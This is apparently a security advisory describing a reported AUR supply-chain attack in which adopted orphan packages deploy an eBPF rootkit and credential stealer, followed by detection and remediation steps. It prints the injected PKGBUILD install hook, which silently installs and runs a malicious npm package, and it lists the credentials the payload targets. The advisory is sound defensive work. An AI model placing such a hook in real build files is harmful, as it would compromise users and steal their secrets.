Atomic Arch: 1,500+ AUR Packages Backdoored with eBPF Rootkit and Credential Harvester
Investigation into Atomic Arch: over 1,500 Arch Linux AUR packages poisoned with eBPF stealth rootkits and credential grabbers.
This post is part of the Week of June 26, 2026 Security Roundup.
Overview
A large-scale supply-chain attack tracked as Atomic Arch compromised more than 1,500 packages in the Arch User Repository (AUR) beginning June 11, 2026. A second wave arrived June 12 using Bun-based installation paths. Attackers systematically adopted orphaned AUR packages — taking over legitimate, unmaintained projects — and injected malicious build logic that deploys an eBPF rootkit with credential harvesting and secret exfiltration capabilities targeting developers, sysadmins, and DevOps engineers.
Attack Mechanics: AUR Orphan Adoption
AUR's package ownership model allows any user to "adopt" an orphaned (unmaintained) package, inheriting its name and package reputation. Attackers exploited this by identifying high-download orphaned packages, requesting ownership, then modifying the PKGBUILD or install hooks to inject malicious build logic:
# Injected dependency in PKGBUILD makedepends:
makedepends=('nodejs' 'npm' 'atomic-lockfile') # malicious npm pkg
# Or in install hook:
post_install() {
npm install -g atomic-lockfile 2>/dev/null
node /usr/lib/atomic-lockfile/index.js &
}
The atomic-lockfile npm package (and variants: js-digest, node-atomic-lock) fetched and executed the second-stage payload during package installation. A second wave on June 12 replaced npm paths with Bun equivalents (bun install atomic-lockfile) to target systems where npm was not present.
Payload Analysis: eBPF Rootkit
The final payload is a sophisticated multi-stage Linux executable that leverages eBPF (extended Berkeley Packet Filter) — the technology that allows programs to run privileged code inside the Linux kernel — for persistence and stealth. Capabilities confirmed by Sonatype, Truesec, and the Cloud Security Alliance:
- Kernel-level persistence: eBPF programs persist across traditional rootkit detection methods
- Process, file, and network hiding: rootkit functionality via Linux socket diagnostic interfaces
- Debugger detection: anti-analysis techniques to evade sandboxed execution
- Credential harvesting: SSH private keys and known_hosts, HashiCorp Vault tokens, browser cookies and saved passwords (Chrome/Chromium), collaboration app data stores (Slack, Discord tokens)
- Secret exfiltration: CI/CD environment variables,
.envfiles, AWS/GCP/Azure credential files,~/.configand~/.aws/credentials - HTTP upload exfiltration: all harvested data is uploaded via HTTPS to attacker infrastructure
Detection
Community-sourced detection tools are available on GitHub (lenucksi/aur-malware-check). Manual detection steps:
# Check for malicious npm packages installed globally
npm ls -g --depth=0 2>/dev/null | grep -E "atomic-lockfile|js-digest|node-atomic-lock"
# Check for eBPF programs loaded (requires root)
bpftool prog list 2>/dev/null
# Review recently installed AUR packages
pacman -Qm # lists all AUR/foreign packages
# Inspect PKGBUILD of installed AUR packages for injected deps
Affected Packages
More than 1,500 AUR packages were compromised across multiple categories: developer tools, system utilities, media applications, desktop environment components, and gaming utilities. The full and updated list of affected packages is maintained by the Arch Linux security team on the Arch Linux Security Tracker.
Remediation
- Treat any system that installed an AUR package between June 11–present as potentially compromised. Rotate all credentials accessible from that system: SSH keys, API tokens, cloud credentials, Vault tokens, browser-stored passwords.
- Run the community detection script:
git clone https://github.com/lenucksi/aur-malware-check && cd aur-malware-check && bash check.sh - Remove malicious npm packages:
npm uninstall -g atomic-lockfile js-digest node-atomic-lock - Reinstall affected AUR packages from source after verifying the PKGBUILD is clean.
- Consider switching to binary package sources only (official Arch repos, trusted PPAs) until AUR trust model improvements are deployed.
- Implement AUR package review workflows: review PKGBUILD diffs before installation, use
aurutilsor similar with diff review enabled, never install AUR packages with--noconfirm. - Inspect all running eBPF programs:
sudo bpftool prog list— unexpected entries warrant investigation.